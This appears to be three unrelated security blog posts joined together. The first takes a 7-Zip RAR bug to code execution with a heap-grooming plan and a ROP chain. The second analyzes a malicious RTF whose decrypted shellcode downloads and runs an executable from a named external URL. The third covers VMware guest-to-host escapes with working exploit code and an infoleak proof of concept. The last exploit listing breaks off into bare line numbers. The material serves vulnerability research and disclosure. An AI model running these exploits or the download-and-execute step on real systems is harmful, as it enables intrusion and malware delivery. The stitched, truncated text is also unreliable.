7-Zip From Uninitialized Memory to Remote Code Execution

Introduction

7-Zip’s RAR code is mostly based on a recent UnRAR version, but especially the higher-level parts of the code have been heavily modified. As we have seen in some of my earlier blog posts, the UnRAR code is very fragile. Therefore, it is hardly surprising that any changes to this code are likely to introduce new bugs.

Very abstractly, the bug can be described as follows: The initialization of some member data structures of the RAR decoder classes relies on the RAR handler to configure the decoder correctly before decoding something. Unfortunately, the RAR handler fails to sanitize its input data and passes the incorrect configuration into the decoder, causing usage of uninitialized memory.

Now you may think that this sounds harmless and boring. Admittedly, this is what I thought when I first discovered the bug. Surprisingly, it is anything but harmless.

In the following, I will outline the bug in more detail. Then, we will take a brief look at 7-Zip’s patch. Finally, we will see how the bug can be exploited for remote code execution.

The Bug (CVE-2018-10115)

This new bug arises in the context of handling solid compression. The idea of solid compression is simple: Given a set of files (e.g., from a folder), we can interpret them as the concatenation to one single data block, and then compress this whole block (as opposed to compressing every file for itself). This can yield a higher compression rate, in particular if there are many files that are somewhat similar.

In the RAR format (before version 5), solid compression can be used in a very flexible way: Each item (representing a file) of the archive can be marked as solid, independently from all other items. The idea is that if an item is decoded that has this solid bit set, the decoder would not reinitialize its state, essentially continuing from the state of the previous item.

Obviously, one needs to make sure that the decoder object initializes its state at the beginning (for the first item it is decoding). Let us have a look at how this is implemented in 7-Zip. The RAR handler has a method NArchive::NRar::CHandler::Extract1 that contains a loop which iterates with a variable index over all items. In this loop, we can find the following code:

Byte isSolid = (Byte)((IsSolid(index) || item.IsSplitBefore()) ? 1: 0);
if (solidStart) {
  isSolid = 0;
  solidStart = false;
}

RINOK(compressSetDecoderProperties->SetDecoderProperties2(&isSolid, 1));

The basic idea is to have a boolean flag solidStart, which is initialized to true (before the loop), making sure that the decoder is configured with isSolid==false for the first item that is decoded. Furthermore, the decoder will (re)initialize its state (before starting to decode) whenever it is called with isSolid==false.

That seems to be correct, right? Well, the problem is that RAR supports three different encoding methods (excluding version 5), and each item can be encoded with a different method. In particular, for each of these three encoding methods there is a different decoder object. Interestingly, the constructors of these decoder objects leave a large part of their state uninitialized. This is because the state needs to be reinitialized for non-solid items anyway and the implicit assumption is that the caller of the decoder would make sure that the first call on the decoder is with isSolid==false. We can easily violate this assumption with a RAR archive that is constructed as follows2:

  • The first item uses encoding method v1.
  • The second item uses encoding method v2 (or v3), and has the solid bit set.

The first item will cause the solidStart flag to be set to false. Then, for the second item, a new Rar2 decoder object is created and (since the solid flag is set) the decoding is run with a large part of the decoder’s state being uninitialized.

At first sight, this may not look too bad. However, various parts of the uninitialized state can be used to cause memory corruptions:

  1. Member variables holding the size of heap-based buffers. These variables may now hold a size that is larger than the actual buffer, allowing a heap-based buffer overflow.
  2. Arrays with indices that are used to index into other arrays, for both reading and writing values.
  3. The PPMd state discussed in my previous post. Recall that the code relies heavily on the soundness of the model’s state, which can now be violated easily.

Obviously, the list is not complete.

The Fix

In essence, the bug is that the decoder classes do not guarantee that their state is correctly initialized before they are used for the first time. Instead, they rely on the caller to configure the decoder with isSolid==false before the first item is decoded. As we have seen, this does not turn out very well.

There are two different approaches to resolve this bug:

  1. Make the constructor of the decoder classes initialize the full state.
  2. Add an additional boolean member solidAllowed (which is initialized to false) to each decoder class. If isSolid==true even though solidAllowed==false, the decoder can abort with a failure (or set isSolid=false).

UnRAR seems to implement the first option. Igor Pavlov, however, chose to go with a variant of the second option for 7-Zip.

In case you want to patch a fork of 7-Zip or you are just interested in the details of the fix, you might want to have a look at this file, which summarizes the changes.

On Exploitation Mitigation

In the previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I mentioned the lack of DEP and ASLR in 7-Zip before version 18.00 (beta). Shortly after the release of that blog post, Igor Pavlov released 7-Zip 18.01 with the /NXCOMPAT flag, delivering on his promise to enable DEP on all platforms. Moreover, all dynamic libraries (7z.dll7-zip.dll7-zip32.dll) have the /DYNAMICBASE flag and a relocation table. Hence, most of the running code is subject to ASLR.

However, all main executables (7zFM.exe7zG.exe7z.exe) come without /DYNAMICBASE and have a stripped relocation table. This means that not only are they not subject to ASLR, but you cannot even enforce ASLR with a tool like EMET or its successor, the Windows Defender Exploit Guard.

Obviously, ASLR can only be effective if all modules are properly randomized. I discussed this with Igor and convinced him to ship the main executables of the new 7-Zip 18.05 with /DYNAMICBASE and relocation table. The 64-bit version still runs with the standard non-high entropy ASLR (presumably because the image base is smaller than 4GB), but this is a minor issue that can be addressed in a future release.

On an additional note, I would like to point out that 7-Zip never allocates or maps additional executable memory, making it a great candidate for Arbitrary Code Guard (ACG). In case you are using Windows 10, you can enable it for 7-Zip by adding the main executables 7z.exe7zFM.exe, and 7zG.exe in the Windows Defender Security Center (App & browser control -> Exploit Protection -> Program settings). This will essentially enforce a W^X policy and therefore make exploitation for code execution substantially more difficult.

Writing a Code Execution Exploit

Normally, I would not spend much time thinking about actual weaponized exploits. However, it can sometimes be instructive to write an exploit, if only to learn how much it actually takes to succeed in the given case.

The platform we target is a fully updated Windows 10 Redstone 4 (RS4, Build 17134.1) 64-bit, running 7-Zip 18.01 x64.

Picking an Adequate Exploitation Scenario

There are three basic ways to extract an archive using 7-Zip:

  1. Open the archive with the GUI and either extract files separately (using drag and drop), or extract the whole archive using the Extract button.
  2. Right-click the archive and select "7-Zip->Extract Here" or "7-Zip->Extract to subfolder" from the context menu.
  3. Using the command-line version of 7-Zip.

Each of these three methods will invoke a different executable (7zFM.exe7zG.exe7z.exe). Since we want to exploit the lack of ASLR in these modules, we need to fix the extraction method.

The second method (extraction via context menu) seems to be the most attractive one, since it is a method that is probably used very often, and at the same time it should give us a quite predictable behavior (unlike the first method, where a user might decide to open the archive but then extract the “wrong” file). Hence, we go with the second method.

Exploitation Strategy

Using the bug from above, we can create a Rar decoder that operates on (mostly) uninitialized state. So let us see for which Rar decoder this may allow us to corrupt the heap in an attacker-controlled manner.

One possibility is to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::HuffDecode3contains the following code:

int bytePlace = DecodeNum(...);
// some code omitted
bytePlace &= 0xff;
// more code omitted
for (;;)
{
  curByte = ChSet[bytePlace];
  newBytePlace = NToPl[curByte++ & 0xff]++;
  if ((curByte & 0xff) > 0xa1)
    CorrHuff(ChSet, NToPl);
  else
    break;
}

ChSet[bytePlace] = ChSet[newBytePlace];
ChSet[newBytePlace] = curByte;
return S_OK;

This is very useful, because the uninitialized state of the Rar1 decoder includes the uint32_t arrays ChSet and NtoPl. Hence, newBytePlace is an attacker-controlled uint32_t, and so is curByte (with the restriction that the least significant byte cannot be larger than 0xa1). Moreover, bytePlace is determined by the input stream, so it is attacker-controlled as well (but cannot be larger than 0xff).

So this would give us a pretty good (though not perfect) read-write primitive. Note, however, that we are in a 64-bit address space, so we will not be able to reach the vtable pointer of the Rar1 decoder object with a 32-bit offset (even if multiplied by sizeof(uint32_t)) from ChSet. Therefore, we will target the vtable pointer of an object that is placed after the Rar1 decoder on the heap.

The idea is to use a Rar3 decoder object for this purpose, which we will use at the same time to hold our payload. In particular, we use the RW-primitive from above to swap the pointer _windows, which is a member variable of the Rar3 decoder, with the vtable pointer of the very same Rar3 decoder object._window points to a 4MB-sized buffer which holds data that has been extracted with the decoder (i.e., it is fully attacker-controlled).

Naturally, we will fill the _window buffer with the address of a stack pivot (xchg rax, rsp), followed by a ROP chain to obtain executable memory and execute the shellcode (which we also put into the _windowbuffer).

Putting a Replacement Object on the Heap

In order to succeed with the outlined strategy, we need to have full control of the decoder’s uninitialized memory. Roughly speaking, we will do this by making an allocation of the size of the Rar1 decoder object, writing the desired data to it, and then freeing it at some point before the actual Rar1 decoder is allocated.

Obviously, we will need to make sure that the Rar1 decoder’s allocation actually reuses the same chunk of memory that we freed before. A straightforward way to achieve this is to activate Low Fragmentation Heap (LFH) on the corresponding allocation size, then spray the LFH with multiple of those replacement objects. This actually works, but because allocations on the LFH are randomized since Windows 8, this method will never be able to place the Rar1 decoder object in constant distance to any other object. Therefore, we try to avoid the LFH and place our object on the regular heap. Very roughly, the allocation strategy is as follows:

  1. Create around 18 pending allocations of all (relevant) sizes smaller than the Rar1 decoder object. This will activate LFH for these allocation sizes and prevent such small allocations from destroying our clean heap structure.
  2. Allocate the replacement object and free it, making sure it is surrounded by busy allocations (and hence not merged with other free chunks).
  3. Rar3 decoder is allocated (the replacement object is not reused, because the Rar3 decoder is larger than the Rar1 decoder).
  4. Rar1 decoder is allocated (reusing the replacement object).

Note that it is unavoidable to allocate some decoder before allocating that Rar1 decoder, because only this way the solidStart flag will be set to false and the next decoder will not be initialized correctly (see above).

If everything works as planned, the Rar1 decoder reuses our replacement object, and the Rar3 decoder object is placed with some constant offset after the Rar1 decoder object.

Allocating and Freeing on the Heap

Obviously, the above allocation strategy requires us to be able to make heap allocations in a reasonably controlled manner. Going through the whole code of the RAR handler, I could not find many good ways to make dynamic allocations on the default process heap that have attacker-controlled size and store attacker-controlled content. In fact, it seems that the only way to do such dynamic allocations is via the names of the archive’s items. Let us see how this works.

When an archive is opened, the method NArchive::NRar::CHandler::Open21 reads all items of the archive with the following code (simplified):

CItem item;

for (;;)
{
  // some code omitted
  bool filled;
  archive.GetNextItem(item, getTextPassword, filled, error);
  // some more code omitted
  if (!filled) {
    // some more code omitted
    break;
  }
  if (item.IgnoreItem()) { continue; }
  bool needAdd = true;
  // some more code omitted
  _items.Add(item);
  
}

The class CItem has a member variable Name of type AString, which stores the (ASCII) name of the corresponding item in a heap-allocated buffer.

Unfortunately, the name of an item is set as follows in NArchive::NRar::CInArchive::ReadName1:

for (i = 0; i < nameSize && p[i] != 0; i++) {}
item.Name.SetFrom((const char *)p, i);

I say unfortunately, because this means that we cannot write completely arbitrary bytes to the buffer. In particular, it seems that we cannot write null bytes. This is bad, because the replacement object we want to put on the heap requires a few zero bytes. So what can we do? Well, let us look at AString::SetFrom4:

void AString::SetFrom(const char *s, unsigned len)
{
  if (len > _limit)
  {
    char *newBuf = new char[len + 1];
    delete []_chars;
    _chars = newBuf;
    _limit = len;
  }
  if (len != 0)
    memcpy(_chars, s, len);
  _chars[len] = 0;
  _len = len;
}

Okay, so this method will always terminate the string with a null byte. Moreover, we see that AStringkeeps the same underlying buffer, unless it is too small to hold the desired string. This gives rise to the following idea: Assume we want to write the hex-bytes DEAD00BEEF00BAAD00 to some heap-allocated buffer. Then we will just have an archive with items that have the following names (in the listed order):

  1. DEAD55BEEF55BAAD
  2. DEAD55BEEF
  3. DEAD

Basically, we let the method SetFrom write all null bytes we need. Note that we have replaced all null bytes in our data with some arbitrary non-zero byte (0x55 in this example), ensuring that the full string is written to the buffer.

This works reasonably well, and we can use this to write arbitrary sequences of bytes, with two small limitations. First, we have to end our sequence with a null byte. Second, we cannot have too many null bytes in our byte sequence, because this will cause a quadratic blow-up of the archive size. Luckily, we can easily work with those restrictions in our specific case.

Finally, note that we can make essentially two types of allocations:

  • Allocations with items such that item.IgnoreItem()==true. Those items will not be added to the list _items, and are hence only temporary. These allocations have the property that they will be freed eventually, and they can (using the above technique) be filled with almost arbitrary sequences of bytes. Since these allocations are all made via the same stack-allocated object item and hence use the same AString object, the allocation sizes of this type need to be strictly increasing in their size. We will use this allocation type mainly to put the replacement object on the heap.
  • Allocations with items such that item.IgnoreItem()==false. Those items will be added to the list _items, causing a copy of the corresponding name. This is useful in particular to cause many pending allocations of certain sizes in order to activate LFH. Note that the copied string cannot contain any null bytes, which is fine for our purposes.

Combining the outlined methods carefully, we can construct an archive that implements the heap allocation strategy from the previous section.

ROP

We leverage the lack of ASLR on the main executable 7zG.exe to bypass DEP with a ROP chain. 7-Zip never calls VirtualProtect, so we read the addresses of VirtualAllocmemcpy, and exit from the Import Address Table to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;
exit(0);

Since we are running on x86_64 (where most instructions have a longer encoding than in x86) and the binary is not very large, for some of the operations we want to execute there are no neat gadgets. This is not really a problem, but it makes the ROP chain somewhat ugly. For example, in order to set the register R9 to PAGE_EXECUTE_READWRITE before calling VirtualAlloc, we use the following chain of gadgets:

0x40691e, #pop rcx; add eax, 0xfc08500; xchg eax, ebp; ret; 
PAGE_EXECUTE_READWRITE, #value that is popped into rcx
0x401f52, #xor eax, eax; ret; (setting ZF=1 for cmove)
0x4193ad, #cmove r9, rcx; imul rax, rdx; xor edx, edx; imul rax, rax, 0xf4240; div r8; xor edx, edx; div r9; ret; 

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 (Build 17134.1) 64-bit with 7-Zip 18.01 x64. As mentioned above, the targeted exploitation scenario is extraction via the context menu 7-Zip->Extract Here and 7-Zip->Extract to subfolder.

On Reliability

After some fine-tuning of the auxiliary heap allocation sizes, the exploit seems to work very reliably.

In order to obtain more information on reliability, I wrote a small script that repeatedly calls the binary 7zG.exe the same way it would be called when extracting the crafted archive via the context menu. Moreover, the script checks that calc.exe is actually started and the process 7zG.exe exits with code 0. Running the script on different Windows operating systems (all fully updated), the results are as follows:

  • Windows 10 RS4 (Build 17134.1) 64-bit: the exploit failed5 17 out of 100 000 times.
  • Windows 8.1 64-bit: the exploit failed 12 out of 100 000 times.
  • Windows 7 SP1 64-bit: the exploit failed 90 out of 100 000 times.

Note that across all operating systems, the very same crafted archive is used. This works well, presumably because most changes between the Windows 7 and Windows 10 heap implementation affect the Low Fragmentation Heap, whereas the rest has not changed too much. Moreover, the LFH is still triggered for the same number of pending allocations.

Admittedly, it is not really possible to determine the reliability of an exploit empirically. Still, I believe this to be better than “I ran it a few times, and it seems to be reliable”.

Conclusion

In my opinion, this bug is a consequence of the design (partially) inherited from UnRAR. If a class depends on its clients to use it correctly in order to prevent usage of uninitialized class members, you are doomed for failure.

We have seen how this (at first glance) innocent looking bug can be turned into a reliable weaponized code execution exploit. Due to the lack of ASLR on the main executables, the only difficult part of the exploit was to carry out the heap massaging within the restricted context of RAR extraction.

Fortunately, the new 7-Zip 18.05 not only resolves the bug, but also comes with enabled ASLR on all the main executables.

Timeline of Disclosure

  • 2018-03-06 — Discovery
  • 2018-03-06 — Report
  • 2018-04-14 — MITRE assigned CVE-2018-10115
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115 and enabling ASLR on the executables.

CVE-2017–11882 RTF — Full description

Two weeks ago a malicious MS Word document was blocked from a sandbox (SHA 256 — 1aca3bcf3f303624b8d7bcf7ba7ce284cf06b0ca304782180b6b9b973f4ffdd7).The sample looked interesting because by that time, VirusTotal had a limited detection rate. Both VirusTotal and Any.Run identified the sample as CVE-2017–11882, one of the infamous Equation Editor exploits. Let’s take a look.

Looking for an OLE

RTF is a quite complex structure by it self. On top of that, adversaries add additional obfuscation layers to prevent both analysts and various analysis tools to detect the malicious objects.

RTF Hide & Seek

Firing up oletools/rtfobj and Didier’s rtdump, looking for OLE objects did not result to anything useful.

rtfdump.py

No OLE objects detected to rtfdump
rtfobj

You can find a list about RTF obfuscation in the links below:

Unfortunately those didn’t help to find an OLE object, so we just looked for “d0cf” (OLE Compound header identifier) where one instance came up

One OLE object instance identified

Analyzing the OLE

Apparently this OLE object has a CLSID of “0002ce02–0000–0000-c000–000000000046” which indicates that the OLE object is related to Equation Editor and to the exploit itself. Additionally one OLE Native Stream was identified (instead of an Equation Native stream).

CLSID related to Equation Editor
OLE CLSID
OLE Native Stream

How OLE Native Stream is related? Cofense has posted a relevant article.

The OLENativeStream is an OLE2.0 stream object contained within an OLE Compound File Storage (MS-CFB) object and contains only one header field, a 4-byte NativeDataSize field

Return to stack

The native stream is 0x795 (1945)bytes long. After that offset the actual content follows. One can guess, that the next 4 bytes, starting from 02 AB 01 E7 are related to Equation Editor MTEF header (given that no Equation Native Stream exists). You can find a good analysis of MTEF here. The header consists of 5 bytes, where the first one should be 0x03. Apparently the MTEF header does not play an important role (Or not?). In addition, there are two extra bytes (0xA, 0x1) which do not map on the MTEF specification. If anyone knows how to interpret those bytes please illuminate me.

Shellcode map

The most important part is the Font Record which have an ID of 0x8 and two one byte identifiers, one for typeface number an one for style (0x9D and 0x7C respectively). Following this byte sequence, the actual font name follows. Font name is stored in a buffer of 40 bytes length; 8 more are needed in order to overwrite the return address, which in our case is 0x00402157. This address belongs to a ret instruction in EQNEDT32.exe

It is well known, that this specific exploit is a stack-based buffer overflow. Our bet is that after the ret instruction, the execution returns to our shellcode. Let’s fire up Windbg.

Windbg return to stack

Prior to the ret instruction the last element in stack is our shellcode (0x0018f354). After the ret command this value will be popped to eip. We can see in the disassembly windows that we have a very clean shellcode.

Analyzing the shellcode

In order to analyze the shellcode I used shellcode2exe and fired IDA. The first call is the 0x004667b0 which is the import address of GlobalLock function call in EQNEDT32.exe which locks our shellcode in memory.

Following a sequence of jmp instructions, we end up in a xor decryption loop. The xor decryption takes place in 0x3FE offset for 0x389 length. In order to help us with the decryption, a small IDA Python script was created (forgive any Python mistakes, Python n00b here). The script can be executed by selecting the desired offset and typing run() in console line in IDA.

from binascii import hexlify
import struct
import ctypes
from ctypes import *
def run():
 startPos = 0x4013fe
 xored = 0
 index = 0
 for index in range (startPos,startPos + 0x389, 4):
  xored = xored * 0x22A76047
  xored = xored + 0x2698B12D
  for i in range (0,4):
   patched_byte = ord(struct.pack('<I',c_uint(xored).value)[i]) ^ Byte(index+i)
   PatchByte(index+i, patched_byte)

After the execution of the script, a URL appeared, therefore something good happened to us.

Bytes before and after the decryption

In the decryption loop the is a call in sub_40147e which before the decryption was meaningless, as the jmp destination was out of range.

Before the decryption

However the same function, after the decryption is totally different. You can observe a lot of dynamic call instructions, which one can bet that they are function pointers resolved by GetProcAddress

After the decryption

In order not to make the post huge and being lazy enough to continue static analysis, Windbg came into the scene. Apparently what the shellcode does, can be summarized in the following steps:

  • ExpandEnvironmentStringsW(“%APPDATA%\wwindowss.exe”,dst_path)
  • URLDownloadToFileW(“ http://reggiewaller.com/404/ac/ppre.exe”,dst_path)
  • CreateProcessW(“C:\Users\vmuser\AppData\Roaming\wwindowss.exe”)
  • ExitProcess

That’s all folks! This post and any following ones are simply a notepad, which document some basic analysis steps. Any comments or corrections are more than welcome.

In the above we presented an analysis of a malicious RTF detected by a sandbox. The RTF was exploiting the CVE-2017–11882. We tried to analyze the RTF, extracted the shellcode and analyzed it. The shellcode is a plain download & execute shellcode.

A bunch of Red Pills: VMware Escapes

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for cloud, and VMware Workstation and Fusion for Desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to a great deal to offer this isolation, especially on the ESXi product where virtual machines of different actors can potentially run on the same hardware. So a strong isolation of is paramount importance.

Recently at Pwn2Own the “Virtualization” category was introduced, and VMware was among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from a guest to the host from a unprivileged account, resulting in executing code on the host, breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how VMware works?

In a nutshell it often uses (but they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and Memory, it also requires lot of other Hardware to work properly and be useful.

This point is very important because it will consist of one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. It’s easily realized by reading any datasheet for hardware software interface for a PC hardware device.

VMware will trap on I/O access on this virtual device and it needs to emulate all those low level operations correctly, since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore if you ever used VMware you might have noticed its copy paste capabilities, and shared folders. How those are implemented?

To summarize, in this blog post we will cover quite some bugs. Both in this “backdoor” functionalities that support those “extra” services such as C&P, and one in a virtualized device.

Altough recently lot of VMware blogpost and presentations were released, we felt the need to write our own for the following reasons:

  • First, no one ever talked correctly about our Pwn2Own bugs, so we want to shed light on them.
  • Second, some of those published resources either lack of details or code.

So we hope you will enjoy our blogpost!

We will begin with some background informations to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components, we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

  • VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run and also handles all the tasks which are impossible to perform from the host ring 3 for example.
  • vmnat: vmnat is responsible for the network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
  • vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles lot of tasks which are relevant for this blogpost, including lot of the device emulation, and backdoor requests handling. The result of the exploitation of the chains we will present will result in code execution on the host in the context of vmware-vmx.

Backdoor

The so called backdoor, it’s not actually a “backdoor”, it’s simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

Basically at the lower level, the backdoor consists of 2 IO ports 0x5658 and 0x5659, the first for “traditional” communication, the other one for “high bandwidth” ones.

The guest issues in/out instructions on those ports with some registers convention and it’s able to communicate with the VMware running on the host.

The hypervisor will trap and service the request.

On top of this low level mechanism, vmware implemented some more convenient high level protocols, we encourage you to check the open-vm-tools repository to discover those since they were covered extensively elsewhere we will not spend too much time covering the details.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

The fundamental points to remember are:

  • It’s a interface guest-host that we can use
  • It exposes complex services and functionalities.
  • Lot of these functionalities can be used from ring3 in the guest VM

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification of a USB host controller (normally implemented in hardware in normal PC) by Intel which supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

1
00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB.

Just by looking at the specifications alone, which are more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specifications just covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

Often to speak directly with the hardware (and by consequence also virtualized hardware), you need to run in ring0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows Kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations such as CFG, Microsoft version of Control Flow Integrity and others, are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.

The following vulnerabilities were identified and analyzed:

  • XHCI: CVE-2017-4904 critical Uninitialized stack value leading to arbitrary code execution
  • CVE-2017-4905 moderate Uninitialized memory read leading to information disclosure

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated XHCI device, when updating the changes of Device Context into the guest physical memory.

The XHCI reports some status info to system software through “Device Context” structure. The address of a Device Context is in the DCBAA (Device Context Base Address Array), whose address is in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and DCBAA resides in the physical RAM. And the XHCI device will keep an internal cache of the Device Context and only updates the one in physical memory when some changes happen. When updating the Device Context, the virtual machine monitor will map the guest physical memory containing the Device Context into the memory space of the monitor process, then do the update. However the mapping could fail and leave the result variable untouched. The code does not take precaution against it and directly uses the result as a destination address for memory writing, resulting an uninitialized variable vulnerability.

To trigger this bug, the following steps should be taken:

  1. Issue a “Enable Slot” command to XHCI. Get the result slot number from Event TRB.
  2. Set the DCBAAP to point to a controlled buffer.
  3. Put some invalid physical address, eg. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
  4. Issue an “Address Device” command. The XHCI will read the base address of Device Context from DCBAA to an internal cache and the value is an controlled invalid address.
  5. Issue an “Configure Endpoint” command. Trigger the bug when XHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled in the “Configure Endpoint” command with one of the Endpoint Context of the Input Context which is also on the stack. Therefore we can control the destination address of the write. And the contents to be written are from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting a write-what-where primitive. By combining with the info leak vulnerability, we can overwrite some function pointers and finally rop to get arbitrary code execution.

Exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;
    
    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
    
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability present in the Backdoor callback handler. A buffer will be allocated on the stack when processing the backdoor requests. This buffer should be initialized in the BDOORHB callback. But when requesting invalid commands, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The successful rate to exploit this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from vmware-vmx stack
    // 
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}

Behind the scenes of Pwn2Own 2017

Exploit the UAF bug in VMware Workstation Drag n Drop with single bug

By fuzzing VMware workstation, we found this bug and complete the whole stable exploit chain using this single bug in the last few days of Feb. 2017. Unfortunately this bug was patched in VMware workstation 12.5.3 released on 9 Mar. 2017. After we noticed few papers talked about this bug, and VMware even have no CVE id assigned to this bug. That’s such a pity because it’s the best bug we have ever seen in VMware workstaion, and VMware just patched it quietly. Now we’re going to talk about the way to exploit VMware Workstation with this single bug.

Exploit Code

This exploit successful rate is approximately 100%.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
